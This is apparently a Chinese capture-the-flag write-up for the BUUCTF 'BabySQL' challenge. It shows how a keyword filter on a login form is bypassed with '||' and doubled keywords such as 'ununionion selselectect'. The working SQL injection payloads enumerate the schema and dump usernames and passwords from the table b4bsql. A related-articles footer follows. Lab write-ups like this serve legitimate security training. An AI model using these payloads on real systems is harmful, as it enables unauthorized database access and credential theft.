BUU13 [极客大挑战 2019]BabySQL 1

题目中过滤了or,需要使用万能密码的变形(将or替换成 || )

登进去没什么用,我们直接在用户名中输入or,select,union,where,from等词语全被过滤了,那还玩个锤子

网上一搜需要使用双写绕过

我们输入1' || 1=1 order by 3 #,发现or和by被过滤掉了

所以需要双写 or 和 by 输入 1' || 1=1 oorrder bbyy 3 #

登陆成功,说明有三列

1' ununionion selselectect 1,2,database() #

输入1' ununionion selselectect 1,2,group_concat(table_name) frfromom information_schema.tables whwhereere table_schema='geek' #

information里头有or,也被过滤了,所以需要双写

1' ununionion selselectect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='geek' #

1' ununionion selselectect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_schema='geek' aandnd table_name='b4bsql'#

1' ununionion selselectect 1,2,group_concat(id,username,passwoorrd) frfromom b4bsql#

flag{fe9beefe-0390-4b0c-8214-57bfbaa43ae7}

和Lovely SQL1一个套路,只不过需要双写绕过

相关推荐
jiayou641 天前
KingbaseES 表级与列级加密完全指南
数据库·后端
GBASE2 天前
G术时刻 |GBase 8s数据库事务并发控制之封锁技术介绍(下)
数据库
xiezhr2 天前
逛GitHub发现了一款免费的带AI功能的数据库管理工具
数据库·ai编程·dba
唐青枫3 天前
MySQL JSON 实战详解:从存储、查询、更新到 JSON_TABLE 与索引
sql·mysql
吃糖的小孩3 天前
给 QQ AI 机器人设计“可控记忆”:会话摘要、手动长期记忆与角色卡边界
数据库
小满8783 天前
5.Mysql事务隔离级别与锁机制
mysql
笃行3504 天前
金仓数据库数据安全双防线:静态存储加密与传输加密实战
数据库
笃行3504 天前
金仓数据库物理备份实战:sys_rman 全流程演练与误覆盖抢救
数据库
笃行3504 天前
金仓数据库逻辑备份实战:从全库导出到 Schema 替换的完整闭环
数据库
元Y亨H4 天前
技术笔记:MySQL 字符集排序规则与大小写敏感性问题解决方案
mysql